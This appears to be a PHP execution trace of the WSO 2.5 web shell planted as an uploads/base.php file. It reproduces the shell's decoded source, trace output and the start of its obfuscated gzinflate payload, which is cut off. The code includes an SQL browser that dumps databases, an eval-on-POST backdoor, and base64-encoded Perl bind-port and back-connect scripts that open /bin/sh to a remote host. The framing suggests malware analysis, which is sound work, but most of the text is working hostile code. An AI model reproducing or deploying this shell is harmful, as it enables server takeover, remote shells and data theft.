@fopen($_POST[\'file\'], \'w\')) {\n foreach($_POST[\'tbl\'] as $v)\n $db->dump($v, $fp);\n fclose($fp);\n unset($_POST[\'p2\']);\n } else\n die(\'<script>alert("Error! Can\\\'t open file");window.history.back(-1)</script>\');\n }\n wsoHeader();\n echo "\n\t<h1>Sql browser</h1><div class=content>\n\t<form name=\'sf\' method=\'post\' onsubmit=\'fs(this);\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>\n\t<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\n\t<input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2 value=\'\'><input type=hidden name=c value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') ."\'>\n\t<td><select name=\'type\'><option value=\'mysql\' ";\n if(@$_POST[\'type\']==\'mysql\')echo \'selected\';\n echo ">MySql</option><option value=\'pgsql\' ";\n if(@$_POST[\'type\']==\'pgsql\')echo \'selected\';\n echo ">PostgreSql</option></select></td>\n\t<td><input type=text name=sql_host value=\\"". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\\"></td>\n\t<td><input type=text name=sql_login value=\\"". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) ."\\"></td>\n\t<td><input type=text name=sql_pass value=\\"". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\\"></td><td>";\n $tmp = "<input type=text name=sql_base value=\'\'>";\n if(isset($_POST[\'sql_host\'])){\n if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\n switch($_POST[\'charset\']) {\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\n case "UTF-8": $db->setCharset(\'utf8\'); break;\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\n case "cp866": $db->setCharset(\'cp866\'); break;\n }\n $db->listDbs();\n echo "<select name=sql_base><option value=\'\'></option>";\n while($item = $db->fetch()) {\n list($key, $value) = each($item);\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\n }\n echo \'</select>\';\n }\n else echo $tmp;\n }else\n echo $tmp;\n echo "</td>\n\t\t\t\t\t<td><input type=submit value=\'>>\' onclick=\'fs(d.sf);\'></td>\n\t <td><input type=checkbox name=sql_count value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> count the number of rows</td>\n\t\t\t\t</tr>\n\t\t\t</table>\n\t\t\t<script>\n\t s_db=\'".@addslashes($_POST[\'sql_base\'])."\';\n\t function fs(f) {\n\t if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\n\t if(f.p1) f.p1.value=\'\';\n\t if(f.p2) f.p2.value=\'\';\n\t if(f.p3) f.p3.value=\'\';\n\t }\n\t }\n\t\t\t\tfunction st(t,l) {\n\t\t\t\t\td.sf.p1.value = \'select\';\n\t\t\t\t\td.sf.p2.value = t;\n\t if(l && d.sf.p3) d.sf.p3.value = l;\n\t\t\t\t\td.sf.submit();\n\t\t\t\t}\n\t\t\t\tfunction is() {\n\t\t\t\t\tfor(i=0;i<d.sf.elements[\'tbl[]\'].length;++i)\n\t\t\t\t\t\td.sf.elements[\'tbl[]\'][i].checked = !d.sf.elements[\'tbl[]\'][i].checked;\n\t\t\t\t}\n\t\t\t</script>";\n if(isset($db) && $db->link){\n echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\n if(!empty($_POST[\'sql_base\'])){\n $db->selectdb($_POST[\'sql_base\']);\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\'><span>Tables:</span><br><br>";\n $tbls_res = $db->listTables();\n while($item = $db->fetch($tbls_res)) {\n list($key, $value) = each($item);\n if(!empty($_POST[\'sql_count\']))\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\n $value = htmlspecialchars($value);\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> <a href=# onclick=\\"st(\'".$value."\',1)\\">".$value."</a>" . (empty($_POST[\'sql_count\'])?\' \':" <small>({$n[\'n\']})</small>") . "</nobr><br>";\n }\n echo "<input type=\'checkbox\' onclick=\'is();\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";document.sf.submit();\'><br>File path:<input type=text name=file value=\'dump.sql\'></td><td style=\'border-top:2px solid #666;\'>";\n if(@$_POST[\'p1\'] == \'select\') {\n $_POST[\'p1\'] = \'query\';\n $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\n $db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\n $num = $db->fetch();\n $pages = ceil($num[\'n\'] / 30);\n echo "<script>d.sf.onsubmit=function(){st(\\"" . $_POST[\'p2\'] . "\\", d.sf.p3.value)}</script><span>".$_POST[\'p2\']."</span> ({$num[\'n\']} records) Page # <input type=text name=\'p3\' value=" . ((int)$_POST[\'p3\']) . ">";\n echo " of $pages";\n if($_POST[\'p3\'] > 1)\n echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']-1) . ")\'>< Prev</a>";\n if($_POST[\'p3\'] < $pages)\n echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']+1) . ")\'>Next ></a>";\n $_POST[\'p3\']--;\n if($_POST[\'type\']==\'pgsql\')\n $_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\n else\n $_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\n echo "<br><br>";\n }\n if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\n $db->query(@$_POST[\'p2\']);\n if($db->res !== false) {\n $title = false;\n echo \'<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">\';\n $line = 1;\n while($item = $db->fetch())\t{\n if(!$title)\t{\n echo \'<tr>\';\n foreach($item as $key => $value)\n echo \'<th>\'.$key.\'</th>\';\n reset($item);\n $title=true;\n echo \'</tr><tr>\';\n $line = 2;\n }\n echo \'<tr class="l\'.$line.\'">\';\n $line = $line==1?2:1;\n foreach($item as $key => $value) {\n if($value == null)\n echo \'<td><i>null</i></td>\';\n else\n echo \'<td>\'.nl_two_areabr(htmlspecialchars($value)).\'</td>\';\n }\n echo \'</tr>\';\n }\n echo \'</table>\';\n } else {\n echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\n }\n }\n echo "<br></form><form onsubmit=\'d.sf.p1.value=\\"query\\";d.sf.p2.value=this.query.value;document.sf.submit();return false;\'><textarea name=\'query\' style=\'width:100%;height:100px\'>";\n if(!empty($_POST[\'p2\']) && ($_POST[\'p1\'] != \'loadfile\'))\n echo htmlspecialchars($_POST[\'p2\']);\n echo "</textarea><br/><input type=submit value=\'Execute\'>";\n echo "</td></tr>";\n }\n echo "</table></form><br/>";\n if($_POST[\'type\']==\'mysql\') {\n $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\n if($db->fetch())\n echo "<form onsubmit=\'d.sf.p1.value=\\"loadfile\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input class=\'tools_inp_area\' type=text name=f><input type=submit value=\'>>\'></form>";\n }\n if(@$_POST[\'p1\'] == \'loadfile\') {\n $file = $db->loadFile($_POST[\'p2\']);\n echo \'<br/><pre class=ml_one_area>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\n }\n } else {\n echo htmlspecialchars($db->error());\n }\n echo \'</div>\';\n wsoFooter();\n }\n function actionNetwork() {\n wsoHeader();\n $back_connect_p="IyEvdXNyl_two_areaJpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnl_two_areaJpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\n $bind_port_p="IyEvdXNyl_two_areaJpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\n echo "<h1>Network tools</h1><div class=content>\n\t\t<form name=\'nfp\' onSubmit=\\"g(null,null,\'bpp\',this.port.value);return false;\\">\n\t\t<span>Bind port to /bin/sh [perl]</span><br/>\n\t\tPort: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>\n\t\t</form>\n\t\t<form name=\'nfp\' onSubmit=\\"g(null,null,\'bcp\',this.server.value,this.port.value);return false;\\">\n\t\t<span>Back-connect [perl]</span><br/>\n\t\tServer: <input type=\'text\' name=\'server\' value=\'". $_SERVER[\'REMOTE_ADDR\'] ."\'> Port: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>\n\t\t</form><br>";\n if(isset($_POST[\'p1\'])) {\n function cf($f,$t) {\n $w = @fopen($f,"w") or @function_exists(\'file_put_contents\');\n if($w){\n @fwrite($w,@base64_decode($t));\n @fclose($w);\n }\n }\n if($_POST[\'p1\'] == \'bpp\') {\n cf("/tmp/bp.pl",$bind_port_p);\n $out = wsoEx("perl /tmp/bp.pl ".$_POST[\'p2\']." 1>/dev/null 2>&1 &");\n sleep(1);\n echo "<pre class=ml_one_area>$out\\n".wsoEx("ps aux | grep bp.pl")."</pre>";\n unlink("/tmp/bp.pl");\n }\n if($_POST[\'p1\'] == \'bcp\') {\n cf("/tmp/bc.pl",$back_connect_p);\n $out = wsoEx("perl /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." 1>/dev/null 2>&1 &");\n sleep(1);\n echo "<pre class=ml_one_area>$out\\n".wsoEx("ps aux | grep bc.pl")."</pre>";\n unlink("/tmp/bc.pl");\n }\n }\n echo \'</div>\';\n wsoFooter();\n }\n function actionRC() {\n if(!@$_POST[\'p1\']) {\n $a = array(\n "uname" => php_uname(),\n "php_version" => phpversion(),\n "safemode" => @ini_get(\'safe_mode\')\n );\n echo serialize($a);\n } else {\n eval($_POST[\'p1\']);\n }\n }\n if( empty($_POST[\'a\']) )\n if(isset($default_action) && function_exists(\'action\' . $default_action))\n $_POST[\'a\'] = $default_action;\n else\n $_POST[\'a\'] = \'SecInfo\';\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\n call_user_func(\'action\' . $_POST[\'a\']);\n exit;\n' /var/www/html/uploads/base.php 1 0
3 7 0 0.006284 1101784 error_reporting 0 /var/www/html/uploads/base.php(1) : eval()'d code 1 1 32767
3 7 1 0.006301 1101856
3 7 R 22527
3 8 0 0.006316 1101816 ini_set 0 /var/www/html/uploads/base.php(1) : eval()'d code 2 2 'display_errors' 1
3 8 1 0.006333 1101888
3 8 R ''
2 A /var/www/html/uploads/base.php(1) : eval()'d code 4 $auth_pass = '4297f44b13955235245b2497399d7a93'
2 A /var/www/html/uploads/base.php(1) : eval()'d code 5 $color = '#df5'
2 A /var/www/html/uploads/base.php(1) : eval()'d code 6 $default_action = 'ff_man'
2 A /var/www/html/uploads/base.php(1) : eval()'d code 7 $default_use_ajax = TRUE
2 A /var/www/html/uploads/base.php(1) : eval()'d code 8 $default_charset = 'Windows-1251'
2 A /var/www/html/uploads/base.php(1) : eval()'d code 11 $userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
3 9 0 0.006426 1101816 implode 0 /var/www/html/uploads/base.php(1) : eval()'d code 12 2 '|' [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
3 9 1 0.006446 1101960
3 9 R 'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler'
3 10 0 0.006464 1101896 preg_match 0 /var/www/html/uploads/base.php(1) : eval()'d code 12 2 '/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i' 'python-requests/2.25.1'
3 10 1 0.006484 1101960
3 10 R 0
3 11 0 0.006497 1101816 ini_set 0 /var/www/html/uploads/base.php(1) : eval()'d code 18 2 'error_log' NULL
3 11 1 0.006513 1101888
3 11 R ''
3 12 0 0.006527 1101816 ini_set 0 /var/www/html/uploads/base.php(1) : eval()'d code 19 2 'log_errors' 0
3 12 1 0.006541 1101888
3 12 R '1'
3 13 0 0.006555 1101816 ini_set 0 /var/www/html/uploads/base.php(1) : eval()'d code 20 2 'max_execution_time' 0
3 13 1 0.006570 1101920
3 13 R '30'
3 14 0 0.006584 1101816 set_time_limit 0 /var/www/html/uploads/base.php(1) : eval()'d code 21 1 0
3 14 1 0.006598 1101880
3 14 R FALSE
3 15 0 0.006612 1101848 define 0 /var/www/html/uploads/base.php(1) : eval()'d code 22 2 'WSO_VERSION' '2.5'
3 15 1 0.006628 1101952
3 15 R TRUE
3 16 0 0.006641 1101880 get_magic_quotes_gpc 0 /var/www/html/uploads/base.php(1) : eval()'d code 24 0
3 16 1 0.006653 1101880
3 16 R FALSE
3 17 0 0.006667 1101880 md5 0 /var/www/html/uploads/base.php(1) : eval()'d code 45 1 'localhost'
3 17 1 0.006682 1101976
3 17 R '421aa90e079fa326b6494f812ad13e79'
3 18 0 0.006697 1101880 wsoLogin 1 /var/www/html/uploads/base.php(1) : eval()'d code 46 0
0.006733 1022672
TRACE END [2023-02-12 22:28:14.627145]
Generated HTML code
<html><head></head><body><div align="center"><form method="post">Password: <input type="password" name="pass"><input type="submit" value=">>"></form></div></body></html>Original PHP code
<?php $a = gzinflate(urldecode("%ED%7D%7D%7F%DB%B6%CE%E8%DF%3D%9F%82%D1%BC%C9%5E%1D%C7v%9A%ADM%E24m%9A%B4%E9%DA%A4%CBK_%D3%C7%93m%D9%D6%22%5B%9A%24%C7%C9%BA%7E%F7%0B%80%A4DI%94%ECd%DD%D9s%EF%EFz%E74%B6D%82+%08%82+%08%02%8C1f%07%81%17t%03%DB%F7%82%C8%99%8E%AA%FB%DD%27%AF%5E%D5%B6%FE%03%AF%983u%BA%A1%1DU%8D%81%13%FA%AEu%D3%A5%C2%A1Qg-%28AE%2A%D6%2C%1Aw%7D%2B%0CY%87%19%0F%DA%8F%7E%1E%3Ex%D0k%AD%3F%DA%D8h%AFo%B4%1Fl%F4%DA%0F%1E%FD%BC%FE%E8%D1%E0g%EB%D1%BA%C1%E1V%FA%9E%EB%05X%E1%BB%C1pC%3E%1C%D8Ck%E6F%5D%AB%1F9%DE%14%DE%9A%C3awbM%CD%CC%FBYhw%AD%DF%ADk%28%11%053%3B%F3%B6%3F%B6%02%C0%19%AB%BFs%A6%03o%1E%AE%B6%DA%1B-S%E0%EB%0C%AB%2B%F6%C4%8Fn%AA%95%EE%E9%FE%C9%DB%FD%93O%E6%8B%B3%B37%DDs%F8%D5%7D%F2%7C%FF%E8%CC%FC%5C%AB%B1%2FT%9A+C%7B%C1%93%91%3D%8D%B0%8BV%10X7U%E3%B9%E7%8D%5C%1B%08a%9C%BA%B3%C0%C7%2F%AFO%8F%9Ez%11%7Es%AC%AE%15%F4%C7%CE%95%1D%E0%CF%0F%D6t%60_%E3%B7%13k%D2s%E1%A1+%AF%C0%C7%0F%EC%11%F43%EA%8F%AB%E6%9A%C9%1A%CC%99%F8%AE7%B0%AB%E6_f%5Dm%BE%06%EF%CC5%07%1F.%89%3B%7E%C6%B65%B0%83%2A%95%5Ck5%9A%ECA%F3%01%3B%F2%22v%E0%CD%A6%03S%C1%05%3F%F6%B5%13%25O%BE%FE%87%FFK%7Fv%25%3B%98%9Cg%5Cod%D6%8F%CEcnI%DE%C3%1B%C1%2Af%BD%99%7B%3B%B1%AE%BB%F6%B5%DD%9F%E10w%23gb%2B%A5%A0%04%3D%EA%BA%CE%C4%89%AA%F1s%18%5Eg%0A%24ywz%DC%85%8E%9F%1E%1E%1F%01%1D%CCvc%C3%AC%25C%3B%82%DA%13k%E4%F4%BB%7F%CC%BC%C8%0E%BB%23%BF_MQd8%9Br%F6%02%40a%148%7E%E8Z%E1%D8%0E%AB%15%1A%D9%2C%F1%02%3B%9A%05S%E6%84%5D%3E%F0%B2%D4c%CE%08%D0%98O8%A9%A0p%7CD%B1M%A6k%23K_%E2%B2%EE%9B%E3%D33%60%B0%1C%5E%F4B%A9S%E9%EE%1D%1F%FFr%B8%AF-%CB_%89%D2b%DC%E2.%CFC%EF%957r%A6U%B5%97%03%C7%AE%1A%DB%03%E7%8AY%AE3%9Av%FA%C0iv%B0%B3%3D%F4%82%09%9B%D8%D1%D8%1Bt%7C%2F%8Cv%DE%C0%1C%9F%7B%C1%60%93m%3BS%7F%16%B1%E8%C6%B7%3B%BEx%CA%A6%D6%84%FF%DAQ_%87%B3%1E%0C%23%BB%B2%DC%99%DD1wv%CC%9D%ED5%84%0C%7F%A0%C9%1D%A3%00S%EC%98%1D%F5%3D%EF%12%B0%AB%5C%02A%AFRSR%F4%F3S%E5%F23%90%A1r%95P%27W-%D5%802%FBc%B9%95b%0F%28%E0%84%C8%A5%9C%EC%9FL%2C%01%93%8A%FD%F0%03%ABN%06%1B%B9%E7%9D%0ESA%A5%98%27%D5%0B%5E95m_%00%24%80QW%21%08%5E%E6%B8%B0%EA%8A%C4Ft%B8%18%0A%E0%F2%D7_l%A9%92l%A5%04%E9%84I%B2%94%03V%8B%40n%CFA%98%C0%B0%C2%AF%EA%9B%17o%BA%C7%A7%F5f%7D%BDF%940%E6%CE%D4H%C0U%3C%94%98%26%3C%14%22%DCvC%3B%FBv%EA%5CK%D9%5C%09%AD%A1%DD%9D%80%E8%83%17%24%2FF%28%2F%E2%A7RV%E1%28%26e%93%F6%B2KY3%5E%A4%60%FD%B2%40%F2v%25%83%85%A9%06roeC%95%B1%07%92%A8%3F%1F%60q%28%0A%DF%AA%09%0EiF%E9%A3%E8%8DQ%D9%ED%8F%07N%90z%29%97%BE%02hD%0EA%AD%14%AF%2B8%00%CD%B1%7B%AE%D5%879%7Bq%81K%CA%1A%FC%13%17Q%A5Dy%8D%A4%F0%D7%18%01x%F6%09%CA%BB%F6%94%BE%D7V%5B%C4%29%B0%26%D5%D2%60%1B%F4PYP%97fR%5C%C0p%E9N%D1%EAV%F5%A0O%D5%9E%E7%B9%B5%9C%3A%90%E0%93%22e%D2%0C%C87%2B%B4%93E%3C%C5%F6%C6%2B%27%8C%D83%27%B0%FB%91%17%DC%18%AC%B3%C3%40%ED%81%05%3C%5D%EC%00t%0A%D0%8B%60Ao%F8c%1F%BE%B1%FE%2C%08%40f2%2C%2Ck%B1%B5%90%AD%CD%D9Z%2F%29%AA%05%F4c%DF%9B%0E%9D%D1%8F%CB%C1RKg%C1%9D%8E%BD9C%CD%E9%CAfPljsN%E6P%A6v%14FV%C4V%AD%A9%B6%5E0%9BNa%C2%80%F0%0C%AE%9C%BE%9D%D4%02%FE%B1%82%28%5B%E7%1C%CAA%5B%7D%D0%1F%22%A5%2C%2A%2AZ%F0%7Do%02%0B%82%1D%28e%AF%1C%7B%9E-%FB%E4%E4%0D%3B%C3%89%C8%8BY%81%0F%08g%0B%1D%BEa%7BD%85Y%60a%0FyY%C7%E7%A4ak%96%EB%1Aq%8D%9AN%EC%2C%C1%061%F9%DD%90%AD%BA%E3%1C%12.%16%1A%3A%AE%CD%AC%08%D6%DF%1Et.d%B0lY%EC%953%9D%5D%03%1D%01%9D%01%E8R%91%0D%C3%3F%E0E%C3%9B0%B2%27%12.Vd%ABW9%D0%21%12%CC%F3%ED%29TC9%96%1FA%F6%17%1B%C1%94f%AB%0EC%3C%EC%DC%90%FA%81%07c%18%E2%D8E3Q%DF%0F%995%BB%D6%F1+%7F%9F%7D3D%EE%04Z%B2p%E6p%FC%05+z%B1%C6VqugC%B6%EA%DB%A0%26%AC6%1F4%9BM+U%A8%85%93%C0%D0%F28%95i%DC%0E%24%A16Z%0A%B5v%29j%A3%BB%A0V%0A%92sb%C3%99%F6iV%97+%88%2AS%A6x%09%C4%1F%17%82%BA0D%C9%0B%FDx%A6%E0%2C%D5%DF%A5%C0%E2X%CC%03%27%C2%A9%CB%86%9E%0B%BB%0D%E0%B6%A9vl8%01%DB%A5%E3Z%0C%AB%14%E7e%40%0B%01%D7%F0%E7%A5%9CC%DDV%CA%EAY%27%0Bky%8A.%02%8D%A86%C6%11%E9%D6%8B%11%8DKjae%E0%2C%8Fd9XB%B1%07%DB%8E%EE%18%84%10%AC%98%8B%D1TK%EBQ%CD%C3%BB%05%BA%0B%C1%13%CAC%D0%BB%C6%13%CBq%83%FEb%8C%95%C2z%84s%D0n%81o%09%F0W%5E%DF%8Al%BDdv%E9%1D%1BG%91%3Fh%E0%C4T%BB%91%7BYP%FBj%0C%3B%BA%B0%A8%BA%F2%B6%A0%3E%2C1%C3%92%F6%D5%D7E%10%C2%9B%1E%88%BC%22%00%C9%DB%82%FA%93%9B%A2%BA%E2MA%3Dk0q%A6i%C1%9C%7BUP%B5%3F%1Ce%25z%FAMQ%3D%C0%A6%A8%A2xUR%13%D6%86%81%15%15%D4%E5%2F%CBk%17%B7%EC%2C%C2%9A%AFK%C5%B5%E1%E5%C2%DA%D4%84%BE%EE%12%3D%E7%3A%7Ey%1F%94B%A5%D0%E4%C2%A7%81QPOe%B1%84OLzl%16%D5%C9%AC-q%25x%5EX%27%FC%C3%D5%D6%81%E7%85ut%EBC%5CQ%BE%2C%AC%5D%24%BAc%08j%81B%28%93%1B%C0%B0%14L%AAD%21%9C%02%A9%1CCQ%DE%17%C1%E8Y%FD%CB%99%8EK%F8%8B%82Z%83%D9DW%07%1F%17%8A%3E%E7J%2B%F2%9C%AB%D4%C6%23gz%7B%C1%ED%B0%19k%93%B4E%0B%3B%017%5E%A7%B6%C7%F8%C9%BDG%AB%D7%F3W%C7O%9F%BC%3A%FDdfL%DF%E6%E7%C4%0C0r%BD%9E%E5%0A%83%7B%F2%D8%EE%8F%3Dfl%8F%A3%89%BB%B3%8D%06%E2%9D%ED%89%1DY%B4p%AC%DA%7F%CC%9C%AB%8E%09%DB%2C%D8%5CD%ABg%B0j%998O%F0W%C7%8C%60W%B3%86%15%B7%98h%AFc%C0%E2%96%C7%B0%C1%0Csg%3Br%22%D7%DE%E1%254%3B%7B%2C%C5V%B9%E8e%DBk%BC%F4%7F%EEm%87%D1%0D%7D%E9y%83%9B%2F8%82%A3%00%AD%D5%AB%D4%8F%CD%EF%1E%3C%D8%D8%12_%ED6%FE%B7%F5%95%97%ADG%83z4%FE%02%AA%E34%DAd%8F%FC%88%BD%9A%F5%9D%81U%7Fk%07%03kjmM%AC%60%E4L7%9B%5BWv%109%7D%CB%5D%25%B3%E7f%E4%F91%C4%16%FE%B7%C5%00%24%E9%A1+%AA%86%DE%17%26%DE%0E%87%C3%AD%3CB%EDv%9B%2A%84%BE5%AD%8F%5BuK%96%97g%1D%2B%CE%04%B7s%D64%8A%CBq%2CW%E7%B63%1A%03%B2%3D%D2v%E9%ED%B8%F5%05%7E%06%F0s%D5%B5%87%D1%E6%86%0F%7BJ%CF%85%AD%8A%18H%DF%1A%0C%60%C3%BE%C9%DA%F0%06%DEn%F1%FE%B6%1E%40%87eO%F5H%CA%FEC%1Dli%E0%5C5%C4%D0%7Ea1%D4%8D%06%C2%E4E%05%06%F4D7%10%0F%08%0E%F4%17%19cu%00%3B_%BE1%DF%9CzS%9B%BF%DB%1C%7B%40%ED%7C%09%80c%07%AE%23%8A5%26n%17%AAt%AD%C0%B6d%F77%5Bq%CF%A9%29%89a%82%1E%8C%24%02%1F%BA%DE%7C%13%B6%B8%91%C7a%21%90.%08%0C+%F2%DC%19D%E3%CDV%B3%F9%FD%D6%98%93z%BD%29%BBO%96%EA%3A%E2%85%15%EA%A1%ED%DA%7D+D%0C%BAt%CC766%B6rh%8A%01%92%0C%08d%8B%D8ko%EA%C1%80%F7%ED%3AL%AAY%E0%D8%01%3B%B2%E7%26a%80%C6%F0%A4A%81%D6w%91%E7%B9a%97%B8O%D0%83h%C7Y%95%5B%E8y%3FyA%E8%86%28%C6%3B%CB%A8%87%9C%A8%40%03%063B%A9%8F%03%AA%EB%8E%8D%FFm%25%95%021nEE%B1%A42dZ%E6%E0e%A2%B9WTf%7D%7D%1D%CAl%AF%C9%09%BF%1D%F6%03%C7%8F%E0%1B%CA%A9%2B%2B%60%FD.%9A%89Q%82%A0%D4%09%7D%BB%EFX.%89%99j%22%02%FB%B0%D4%91%99%D00%B7%92%AAVq%D5%5D%29%B0%2C%AAg%98J%83%5C%84-Q7%11%D7%08Ai%D8o%C5%B5%ABh7%F7%3D%A5%96%DF2%3F%D7%8D%8B%A9Q%5B%E9t%86%96%1B%DA%B5%C7%A6%B9%99%EF%9DZ%7E%FF%E8%AC%FB%EB%F9%F1%D9%FEi-%D7X%BB%AC%B1%F6-%1Bk%2Fhl%BD%AC%B1%F5%5B6%B6%5E%DE%18Z%B0%07%5E%7F6%01%8E%87%C7%F7%E2%E5%14%CD%CDV%BD_%F7%5Bu%BF%5D%F7%D7%EBb%24pq%BDw%EF%1E%AC%AB%D6Jg%3As%DD%DA%A01%196%AC%06%3F%80%B2%B6%D0%14%C8%D2%CF%BA%5B%A2J_%AD%D2%17%AF%FBJ%95%F8Y%5C%C5o%A9u%FC%96%28%E0%B7%94Z%CA%D3%A4%5E%3BU%AF-K%B4%D5z%C9%D3%A4%DEz%AA%DE%BA%2C%B1%AE%D6K%9E%26%5D%E3%E4Iu%90%3F%92%5D%E2%BF%D4%CE%EA%DE%13%C0%AF%EAH%8C%CA%C6%A1p%98%08%2Fj%86%1F%10Vk9%C0%D6%DD%01%13%9FZ%815%A1%03%26%3C%1B%E8%A0%A3%80I%2FA%E0V%9DNs%CB%D9%A6%F6A%E2%23w%85%0D%D7%9E%8E%A2%F1%96s%FF%7E%0D%8B%DD%13%00%EE%03%84%1F%CC%FB%A9%B2%9F%9C%CF%0D%DC%C3%DF7%3B%E6%7D%7B%DA%F7%06%F6%F9%C9%E1%9E%07%2B%FC%14%DEWs%85%89%86%1C%B70%A8%D2%E4%81%85%2C9%B5%95%8A%D1%C9%FE%AF%E7%FB%A7g%5D%80%26dJ%5Dt%24O%1F%004%0B%DC%F8%BDd%7CV%9D%93%D7C%E3%FD%EBW%2F%40%9B%3B%01m%CE%0E%23%DE%A7%C0%FE%03%282%B5%E7%2C%FD%96%93%FF%1E%0D%BE%02%E2%09%1D%27%BC%3F%EE%FD%0E%ABb%16B%EAe%D5%7C%ED%F4%03%2F%84m%3F5%0C%0A%1E%9E%A1%DDK%14%5DV%85%AA%84%A5%AA%D7%C2%B3%867%85%95ap%83%D6jPK%AD%E9%08O%FF%84%0D%1B%F0%DB%A3G%5B%9Az%BE%3D%AD%9A%28H%80JD%0A%1C%E4%9A%A6%240%86%E8%28%D7%C1Y5%AD%DC%D6%81I%7C%DF%05m%10%29%BBv%BD%3A%9F%CFWqa%5E%9D%E1i%18%8E%EF%C0%D4%03%9E%0E%AA%C9%00%C9W_%B3c%95%EDM5%91SD%97%06Q%E0%14%29%80%07W%0Fj%8CS%1B%DES3d%C8%C77%EDfST%E5%5C%1E%D8%231%1C%27%F6h%FF%DA%AF%5E%18%D5%0B%F8%0C%EE%D